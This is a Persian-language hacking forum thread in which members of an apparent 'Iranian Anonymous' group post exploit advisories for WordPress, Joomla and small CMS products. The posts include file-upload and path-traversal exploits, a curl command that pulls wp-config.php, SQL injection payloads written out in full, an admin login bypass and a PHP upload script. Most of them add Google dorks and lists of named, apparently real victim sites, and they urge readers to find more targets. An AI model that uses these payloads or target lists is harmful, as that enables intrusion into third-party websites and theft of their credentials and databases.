پرش به


تصویر

  • لطفا وارد حساب کاربری خود شوید تا بتوانید پاسخ دهید
61 پاسخ برای این موضوع

#8903 ارسالی 01 ژانویه 2016 - 12:33

InfernaL
+791
    OFFLINE
    تاریخ عضویت :
    10 نوامبر 2015
  • %100██████████
  • banned
  • 170 ارسال
    Last Visit ژوئن 04 2016 11:20
  • Slogan : Hacking And Programming
  • Country :
  • Gender : Male
  • Location : NakojaAbad
  • Name : Shahin

*
پست محبوب

به نام خدا

 

با عرض سلام و خسته نباشید خدمت اعضا محترم ناشناس

در این تاپیک اکسپلویت ها <اسیب پذیری های ثبت شده توسط تیم امنیتی هکران ناشناس

قرار خواهد گرفت.

 

اکسپلویت ها و آسیب پذیری ها با نام(Iranonymous.org)به ثبت خواهد رسید.

توجه کنید که آسیب پذیری ها فقط در یکی از سایت های ثبت اکسپلویت معتبر قابل قبول میباشد

مانند:

CXsecurity

Exploit-db

Milw00rm

Iedb

Vulnerability-lab

0day

 

قالب کلی ثبت اکسپلویت به شکل زیر هست:

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title: [-]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Google Dork: [-]
[+] Date: [-]
[+] Exploit Author: Iranian Anonymous
[+] Vendor Homepage: [-]
[+] Software Link: [-]
[+] Version: [-]
[+] Tested on: [-]
[+] CVE : [-]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] DISCRIPTION: [-]
[+]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Demo: [-]
[+] 
[+]
[+]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Thanks to : MR.Khatar || KHAN || ℓℓ_αzαв ѕιуαн_ℓℓ || iran || Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D
[+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier And All Of Iranian Anonymous
[+] We Are Iranian Anonymous Iranonymous.org
[+] Discovered By: 
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

قوانین:

1-در صورت عدم رعایت موارد فوق اکسپلویت قابل قبول نبوده و حذف خواهد شد

2-اسپم و سوال به هر نحوی ممنوع

 

[هماهنگ شده با خان]

 

موفق و سربلند باشید


ویرایش شده توسط InfernaL 01 ژانویه 2016 - 12:37 .

تف تو ذات گارد ایران

من یه گارد ایرانی بودم ولی ندونستن قدرمو


انانیموس پرچم بالاس


تصویر


#2 ارسالی 02 ژانویه 2016 - 04:53

InfernaL
+791
    OFFLINE
    تاریخ عضویت :
    10 نوامبر 2015
  • %100██████████
  • banned
  • 170 ارسال
    Last Visit ژوئن 04 2016 11:20
  • Slogan : Hacking And Programming
  • Country :
  • Gender : Male
  • Location : NakojaAbad
  • Name : Shahin

*
پست محبوب

https://www.milw00rm.com/exploits/11957
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Exploit Title: Wordpress Formcraft Plugin File Upload Vulnerability
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Google Dork: intext:"powered by formcraft", inurl:plugins/formcraft
[+] Date: 1/2/2016
[+] Exploit Author: Iranian Anonymous
[+] Vendor Homepage: [https://wordpress.org/plugins/formcraft-form-builder/]
[+] Software Link: [-]
[+] Version: [All Version]
[+] Tested on: [Windows_Google Chrome & Mozila]
[+] CVE : [-]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] DISCRIPTION: Hello Guys.The vulnerability of the type of uploading files.With This Exploit You Can Upload Your Files
[+] -->
[+] Exploit:Exploit:[SITE]/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] If you have received this error
[+] --> [{"failed":"No file found 2"}]
[+] This means that Your Target Has This Vulnerability.
[+] Script file Upload ==>
[+] [<title>iranonymous_InfernaL</title>
[+] <text>CW Wordpress Exploit</text>
[+] <form method="POST" action="
[+] [Target]/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] " enctype="multipart/form-data">
[+] <input type="file" name="files[]" /><button> iranonymous  Arama</button>
[+] </form>]
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Demo: 
[+] http://tender-lite.ru/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://die-ruerup-rente.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://murrysvillepolice.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://vtra.ca/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://www.kyfame.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://krsdtrust.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://artbraaustin.org/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://jets-inc.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://boat-sites.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://dj4torontowedding.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://arunnerscircle.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://neonheadquarters.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://murrysville.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://comicconatsea.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://queensaccounting.ca/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+] http://morenoroofing.com/wp-content/plugins/formcraft/file-upload/server/content/upload.php
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Thanks to : MR.Khatar || KHAN || ll_azab-siyah_ll || iran || Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D
[+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier  And All Of Iranian Anonymous
[+] We Are Iranian Anonymous Iranonymous.org
[+] Discovered By: InfernaL
[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

# milw00rm.com [2016-01-02]

Special TNX KHAN


تف تو ذات گارد ایران

من یه گارد ایرانی بودم ولی ندونستن قدرمو


انانیموس پرچم بالاس


تصویر


#3 ارسالی 17 مارس 2016 - 11:12

GoodBye Hack
+7,215
    OFFLINE
    تاریخ عضویت :
    24 فوریه 2015
  • مدیر کل
  • Leaders
  • 1,924 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : Black

*
پست محبوب

https://cxsecurity.com/issue/WLB-2016020137
E-Dito Administration Script Sql Injection
#.:. Dork : inurl:fiche.php?id= #
#.:. Dork 2 : inurl:admin/fiche.php?id= #
#.:. Tested on : win&linux #
#.:. Vendor's Website : Création site internet dynamique et administrable, facile à gérer #
##################################################
+] We Are Iranian Anonymous Iranonymous.org
[+] Discovered By: Hacker Khan
##################
VULNERABILITY
##############
[~] VULNERABILITY}~~
[~] http://www.site.com/fiche.php?id=[SQL INJECTION]
[~] http://www.site.com/admin/fiche.php?id=[SQL INJECTION]
#########
Type: String Mysql Injection
http://SITE/fiche.php?id=[SQL INJECTION]
http://site/fiche.php?id=175+UNION+S...%28%29,32%20--
################################################## [+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]
[+] Thanks to : MR.Khatar |||| ll_azab-siyah_ll || iran || Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D
[+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier || InfernaL And All Of Iranian Anonymous

(-_-)We Are Anonymous(-_-)IM Black.Sec
 

16_cosso.png

 

:excl: به هیچ عنوان به صورت پیام خصوصی به سوالات شما پاسخ داده نخواهد شد :excl:

 

 


#4 ارسالی 05 آوریل 2016 - 12:50

GoodBye Hack
+7,215
    OFFLINE
    تاریخ عضویت :
    24 فوریه 2015
  • مدیر کل
  • Leaders
  • 1,924 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : Black

*
پست محبوب

https://cxsecurity.com/issue/WLB-2016040029
# Exploit Title: Arbitrary file download in Memphis Document Library 3.1.5
# Google Dork: inurl:"mdocs-posts" -site:wordpress.org
# Vendor Homepage: https://wordpress.org
# Software Link: https://downloads.wordpress.org/plugin/memphis-documents-library.3.1.5.zip
# Version: 3.1.5 (Vulnerable from 2.3 to 3.1.5, fixed in 3.1.6)
# Tested on: Ubuntu 12.04, Wordpress 4.4.2.
# CVE : N/A
# Vulnerable file: memphis-documents-library/mdocs-downloads.php
# Vulnerable function: mdocs_img_preview()
# Vulnerable GET parameter: Injectable 'mdocs-img-preview'
# Vulnerable line: 90 to 93
# Vulnerable code:
87 function mdocs_img_preview() {
88 require_once(ABSPATH . 'wp-includes/pluggable.php');
89 $upload_dir = wp_upload_dir();
90 $image = $upload_dir['basedir'].MDOCS_DIR.$_GET['mdocs-img-preview'];
91 $content = file_get_contents($image);
92 header('Content-Type: image/jpeg');
93 echo $content; exit();
94 }# POC:curl http://example.site.com/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.phpor if the plugin is not installed in the root folder of wordpress, for
example in the folder "mdocs-posts":curl http://example.site.com/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
-o example-wp-config.php
#################################
[+] We Are Iranian Anonymous Iranonymous.org
[+] Discovered By: Hacker Khan
################=
[+] Thanks to : MR.Khatar |||| ll_azab-siyah_ll || iran || Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D
[+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier || InfernaL And All Of Iranian Anonymous

 .


(-_-)We Are Anonymous(-_-)IM Black.Sec
 

16_cosso.png

 

:excl: به هیچ عنوان به صورت پیام خصوصی به سوالات شما پاسخ داده نخواهد شد :excl:

 

 


#5 ارسالی 05 آوریل 2016 - 12:51

GoodBye Hack
+7,215
    OFFLINE
    تاریخ عضویت :
    24 فوریه 2015
  • مدیر کل
  • Leaders
  • 1,924 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : Black

*
پست محبوب

https://cxsecurity.com/issue/WLB-2016040028
# Exploit Title: Wordpress Plugin HB Audio Gallery Lite - Arbitrary File Download
# We Are Iranian An/
# Exploit Author: Hacker Khan
# Google Dork : inurl:/wp-content/plugins/hb-audio-gallery-lite
# Vendor Homepage: https://fr.wordpress.org/plugins/hb-audio-gallery-lite/
# Tested on: MSWin32
# Version: 1.0.0
############
# Vuln file : gallery/audio-download.php
11. if( $_REQUEST['file_size'] && $_REQUEST['file_path'] ) {
13. $file_size = $_REQUEST['file_size'];
15. $file = $_REQUEST['file_path'];
17. $filename = basename($file);
....
55. Header("Content-Disposition: attachment; filename='" . $filename . "'");#####################
# PoC : /wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10####################
Demo:www.frenchandindianwarfoundation.org//wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10www.jampettahmethodist.org/mobile/wp-content/plugins/hb-audio-gallery-lite/gallery/audio-download.php?file_path=../../../../wp-config.php&file_size=10
##########################
[+] Thanks to : MR.Khatar |||| ll_azab-siyah_ll || iran || Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D
[+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier || InfernaL And All Of Iranian Anonymous

 .


(-_-)We Are Anonymous(-_-)IM Black.Sec
 

16_cosso.png

 

:excl: به هیچ عنوان به صورت پیام خصوصی به سوالات شما پاسخ داده نخواهد شد :excl:

 

 


#6 ارسالی 06 آوریل 2016 - 08:21

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 596 ارسال
    Last Visit مارس 06 2018 11:51
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Lord Black

*
پست محبوب

https://cxsecurity.com/issue/WLB-2016030074
http://iedb.ir/exploits-4892.html
|====================================================================================
# Exploit Title: Elevel Design - SQL Injection
# Exploit Author: Blackwolf_Iran
# Date: November - December 2015
# Email: blackwolf@post.com
# Vendor Homepage: http://www.elevel.it/
# OUR SITE : https://iranonymous.org/
|====================================================================================
# {INFO}
# SQL Injection Vulnerability
|====================================================================================
# {DORK}
# intext:"Web Design By Elevel" inurl:?id=
|====================================================================================
# {POC}
# http://www.site.com/news.php?id=7[SQL Injection]
# http://www.site.it/galleria.php?id=3[SQL Injection]
# http://www.ascentproject.eu/project_forumnews.php?id=4[SQL Injection]
|====================================================================================
# {DEMO}
# 01: http://www.marinogiada.com/news.php?id=7
# 02: http://www.siatautomazioni.it/news_dettaglio.php?id=21
# 03: http://www.agenziaimmobiliareborghesi.com/annunci.php?id=200
# 04: http://www.libertasravenna.it/news.php?id=41
# 05: http://www.alfredolando.it/galleria.php?id=3
# 06: http://www.ascentproject.eu/project_forumnews.php?id=4
# 07: http://ravenna.azinet.it/aziende/articoli-stampati-gomma-membrane-guarnizioni/42119/link.php?id=42119
# 08: http://www.dribblingravenna.it/news.php?id=187
# 09: http://www.intermed-shipping.it/multimedia.php?id=2
# 10: www.emporiodellapietra.it/news.php?id=2
|====================================================================================
# {TNX For}
# >>> Mr.khatar - Hacker Khan ;
# >>> Discovered By Blackwolf_Iran
|====================================================================================
The END ; Good Luck :D:D:D


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#7 ارسالی 06 آوریل 2016 - 08:21

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 596 ارسال
    Last Visit مارس 06 2018 11:51
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Lord Black
https://cxsecurity.com/issue/WLB-2016030068
http://iedb.ir/exploits-4906.html
 	
iReadyWeb version 1.x.x CMS - Multiple Vulnerabilities (SQLi - Admin Bypass)
Published
	
Credit
	
Risk
2016.03.13
	
Blackwolf_Iran
	
Medium
CWE
	
CVE
	
Local
	
Remote
CWE-89
	
N/A
	
No
	
Yes
Dork: intext:"Powered by iReadyWeb.com" inurl:id=

|=======================================================================
|Exploit Title: iReadyWeb version 1.x.x CMS - Multiple Vulnerabilities (SQLi - Admin Bypass)
|Exploit Author: Blackwolf_Iran
|Date : Sunday, March 13, 2016
|Email : blackwolf@post.com
|Site : http//iranonymous.org/
|Tested on : win 10 & Linux
|Vendor Home Page : http://www.ireadyweb.com/
|Version : 1.x.x
|=======================================================================
|{Admin Bypass Vul}
|In This Vul An Attacker Can Bypass Admin Login Page And Login with Admin User
| And Upload Shells Or Edit Home Page...
| Admin Login : you can just type Address of site and add /webadmin/
| for example : site.com/webadmin
|Site Redirect you to this page : site.com/webadmin/login.php
|in this page you can bypass login :
|Username : '=' 'or'
|Password : '=' 'or'
|---------------------
|{Demo}
| 1) http://value-vac.com/webadmin/
| 2) http://pinkgluta.com/webadmin/
| 3) http://cornerstonemgmnt.com/webadmin/
| 4) http://www.kinetics.co.th/webadmin/
| 5) http://cart.uberthailand.com/webadmin/
|If You want more! you can search this DORK in GOOGLE :D
|DORK : intext:"Powered by iReadyWeb.com"
|=======================================================================
|{SQL injection Vul}
|in this vul An Attacker can Run SQL Methods :D
| for exp : site.com/news.php?id=-56%27+UNION+SELECT+1,2,3,4,5,user%28%29,7,8,9,10,11,12--+
|---------------------
|{Demo}
| 1) http://cart.uberthailand.com/product.php?id=-15%27+UNION+SELECT+1,2,3,4,user%28%29,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--+
| 2) http://www.kinetics.co.th/news.php?id=-13%27+UNION+SELECT+1,user%28%29,3,4,5,6,7,8,9,10,11,12--+
| 3) http://cornerstonemgmnt.com/project-reference.php?id=-12%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,user%28%29,13,14,15,16,17,18,19,20--+
| 4) http://pinkgluta.com/news.php?id=-56%27+UNION+SELECT+1,2,3,4,5,user%28%29,7,8,9,10,11,12--+
| 5) http://www.marianconstantine.com.au/category.php?category=4%27
|If You want more you can search this DORK in GOOGLE :D
|DORK : intext:"Powered by iReadyWeb.com" inurl:id=
|=======================================================================
|SpC TnX To: Hacker Khan - Mr.Khatar - R4DIC4L , .
|And All Of Iranian Hackers
|Discovered By: Blackwolf_Iran
|=======================================================================

Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#8 ارسالی 06 آوریل 2016 - 08:22

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 596 ارسال
    Last Visit مارس 06 2018 11:51
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Lord Black
http://iedb.ir/exploits-4931.html
====================================================================================
# Exploit Title: Global Soft Services CMS - Multiple SQL Injection Vulnerability
# Exploit Author: Blackwolf_Iran
# Date: 2016-03-17
# Email: blackwolf@post.com
# Vendor Homepage: http://www.globalsoftservices.com/
# OUR SITE : https://iranonymous.org/
|====================================================================================
# {Description about Web designer and CMS}
#
# Global Soft Services is one of the leading Web #Design and Software Development organization #based in heart of Greater Kolkata, India.
#
|====================================================================================
# {Description about Bug}
# SQL Injection Vulnerability
# In this Vuln An Attacker Can Run SQL Methods And Inject SQL commands to read database!
# in Database, An Attacker Can Find And Read Admin user and password password :D
# Vulnerability can Convert To LFI :)
# :D
|====================================================================================
# {DORK}
# intext:"Designed & Developed by Global Soft Services" inurl:id=
# intext:"Designed & Maintained by Global Soft Services" inurl:id=
|====================================================================================
# {POC}
# 3 parameters of 3 php files Have Sql injection vulnerabilities
#
# http://www.site.com/details.php?id=116[SQL Injection]
# http://www.site.com/product_list.php?type=1&category=10[SQL Injection]
# http://www.site.com/investor.php?id=14[SQL Injection]
|====================================================================================
# {DEMO}
# 01: http://www.ermuindia.com/ermu_sw/details.php?id=-116%27+/*!50000UNION*/+SELECT+1,2,3,4,5,database%28%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21--+
# 02: http://www.etsc.in/product_list.php?type=1&category=-10%27+*!50000union*/+select+user%28%29,2,3,4,5,6--+
# 03: http://www.pariwarfashions.com/product.php?id=-KP1385%27+/*!50000UNION*/+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,database%28%29,22,23,24--+
# 04: http://www.starferrocement.co.in/investor.php?id=-14%27+UNION+SELECT+1,2,database%28%29,4,5--+
# 05: http://www.globalsoftservices.com/etsc_web/product_list.php?type=1&category=-4%27+*!50000union*/+select+database%28%29,2,3,4,5,6--+
# If You Want More Targets! You Can Search Dorks In GOOGLE! :D
|====================================================================================
# Special Tnx : Ormazd - perfect Admin of Iranonymous.org
# {TNX For}
# »> Mr.khatar - Hacker Khan ;
# »> Discovered By Blackwolf_Iran
|====================================================================================
The END ; Good Luck :D:D:D


Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#9 ارسالی 08 آوریل 2016 - 12:53

    OFFLINE
    تاریخ عضویت :
    16 نوامبر 2015
  • Professional Hacker
  • Super Moderator
  • 596 ارسال
    Last Visit مارس 06 2018 11:51
  • Slogan : SEC_RITY is not complete without U!
  • Country :
  • Gender : Male
  • Location : IN YOUR SYSTEM
  • Name : Lord Black
https://cxsecurity.com/issue/WLB-2016040041
 
http://iedb.ir/exploits-5020.html
 

===================================================================================
# Exploit Title: N.E.T E-Commerce group - SQL Injection Vulnerability
# Exploit Author: Blackwolf_Iran
# Date: 2016-03-30
# Email: blackwolf@post.com
# Vendor Homepage: http://www.iranmc.com/
|====================================================================================
# {DORK}
# intext:"Designed And developed By N.E.T E-Commerce group" inurl:cat.php?id=
|====================================================================================
# {POC}
# http://www.site.com/cat.php?id=36[SQL Injection]
|====================================================================================
# {DEMO}
# 01: http://www.ipda.ir/cat.php?id=-12%27+UNION+SELECT+1,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
# 02: http://www.atigh.com/cat.php?id=-11%27+UNION+SELECT+1,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
# 03: http://www.sell.hostblog.ir/cat.php?id=-33%27+UNION+SELECT+1,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
# 04: http://www.sorenshop3.ir/cat.php?id=-23%27+UNION+SELECT+1,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
# 05: http://www.ptcparsi.ir/cat.php?id=-37%27+UNION+SELECT+1,2,3,4,5,6,7,user%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
# 06: http://www.iranbbs.com/cat.php?id=-36%27+UNION+SELECT+1,2,3,4,5,6,7,database%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
# 07: http://www.iranmc.ict1.ir/cat.php?id=-11%27+UNION+SELECT+1,2,3,4,5,6,7,database%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
# 08: http://www.iran2.ir/cat.php?id=-13%27+UNION+SELECT+1,2,3,4,5,6,7,database%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
# 09: http://www.simka.ir/cat.php?id=-33%27+UNION+SELECT+1,2,3,4,5,6,7,version%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
# 10: http://www.dtools.ir/cat.php?id=-26%27+UNION+SELECT+1,2,3,4,5,6,7,version%28%29,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--+
#
# If You Want More Targets! You Can Search Dork in GOOGLE! :D
|====================================================================================
# {TNX For}
# >>> Mr.khatar - Hacker Khan - Ormazd
# >>> Discovered By Blackwolf_Iran
|====================================================================================
The END ; Good Luck :D:D:D
 

ویرایش شده توسط Blackwolf_Iran 11 آوریل 2016 - 08:18 .

Exploit-DB

(( AirSploit Framework Wireless Security To0l ))

GitHub :)

دیتابیس های مورد نفوذ قرار گرفته

آموزش کامل سیملینک

آپلود شل با هر نوع فرمتی

باگ های ثبت شده here & here

..:: Blackwolf_Iran ::..

------------------------------------------------------------------------------------------------------------------------------------------------------

Im Just a Security Researcher =)

image.gif


#10 ارسالی 11 آوریل 2016 - 01:26

GoodBye Hack
+7,215
    OFFLINE
    تاریخ عضویت :
    24 فوریه 2015
  • مدیر کل
  • Leaders
  • 1,924 ارسال
    Last Visit
  • Country :
  • Gender : Male
  • Name : Black
https://cxsecurity.com/issue/WLB-2016040067
# Exploit Title: Joomla Image Upload - Arbitrary File Upload
# We Are Iranian Anonymous Iranonymous.org
# Discovered By: Hacker Khan
# Google Dork: inurl:option=com_simpleimageupload=
# Vendor Homepage: http://tuts4you.de/
# Software Link: http://tuts4you.de/96-development/156-simpleimageupload
# Version: 1.0
# Tested on:Win32
# Vuln Same to Com_Media Vulnerability
#########
POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
#########tamper data
Host:127.0.0.1User-Agent=Mozilla/5.0 (Windows NT 6.1; rv:46.0) Gecko/20100101 Firefox/46.0Accept=text/html/php,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language=en-US,en;q=0.5Accept-Encoding=gzip, deflateCookie=92e1ffe3bb23e8a366ff65194917235e=15168f4d2be2ab52b9730a55b4674ae5Connection=keep-aliveContent-Type=multipart/form-data; boundary=---------------------------281102171512373Content-Length=49328POSTDATA =-----------------------------281102171512373
Content-Disposition: form-data; name="Filedata"; filename="Neme file.php"
Content-Type: image/jpeg-----------------------------281102171512373
Content-Disposition: form-data; name="return-url"aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWpmb3JtX2FydGljbGV0ZXh0
-----------------------------281102171512373--your File neme shell.http://www.bonyadtabari.ir//images/pic/neme fail.php##########
# Exploit :<?phpecho '<form action="#" method="post" enctype="multipart/form-data">
<input type="text" name="target" value="www.localhost.com" /><input type="submit" name="Pwn" value="Pwn!" />
</form>';
if($_POST) {$target = $_POST['target'];$file = "0wn3d ! ;)";
$header = array("Content-Type: application/x-php",
"Content-Disposition: form-data; name="Filedata"; file="L0v3.php."");$ch = curl_init("http://".$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36");
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$file", "return-url" => "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
$result = curl_exec($ch);
curl_close($ch);
print "$result";} else { die(); }
?>
#########
Demo:http://dartmoorscenictours.co.uk/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_texthttp://www.khamphoempittaya.ac.th/en/?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_contenthttp://www.smarterhomesolutions.net/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=jform_texthttp://www.agescirimini.it/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=comment##########[+] Thanks to : MR.Khatar |||| ll_azab-siyah_ll || Rising || Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D
[+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier || InfernaL And All Of Iranian Anonymous

(-_-)We Are Anonymous(-_-)IM Black.Sec
 

16_cosso.png

 

:excl: به هیچ عنوان به صورت پیام خصوصی به سوالات شما پاسخ داده نخواهد شد :excl:

 

 






همچنین به ثبت باگ, تیم ثبت باگ, اکسپلویت های ثبت شده, اکسپلویتینگ, کشف باگ و آسیب پذیری ها, هک سایت با اکسپلویت, اکسپلویت های هک سایت, اکسپلویت های لینوکس, اکسپلویت های ویندوز, تیم کشف باگ و آسیب پذیری, تیم امنیتی هکران ناشناس, تیم کشف آسیب پذیری هکران ناشناس, آسیب پذیری های کشف شده توسط هکران ناشناس نیز برچسب خورده است

1 کاربر در حال خواندن این موضوع است

0 کاربر، 1 مهمان و 0 عضو مخفی

رفتن به اول صفحه | Back To UP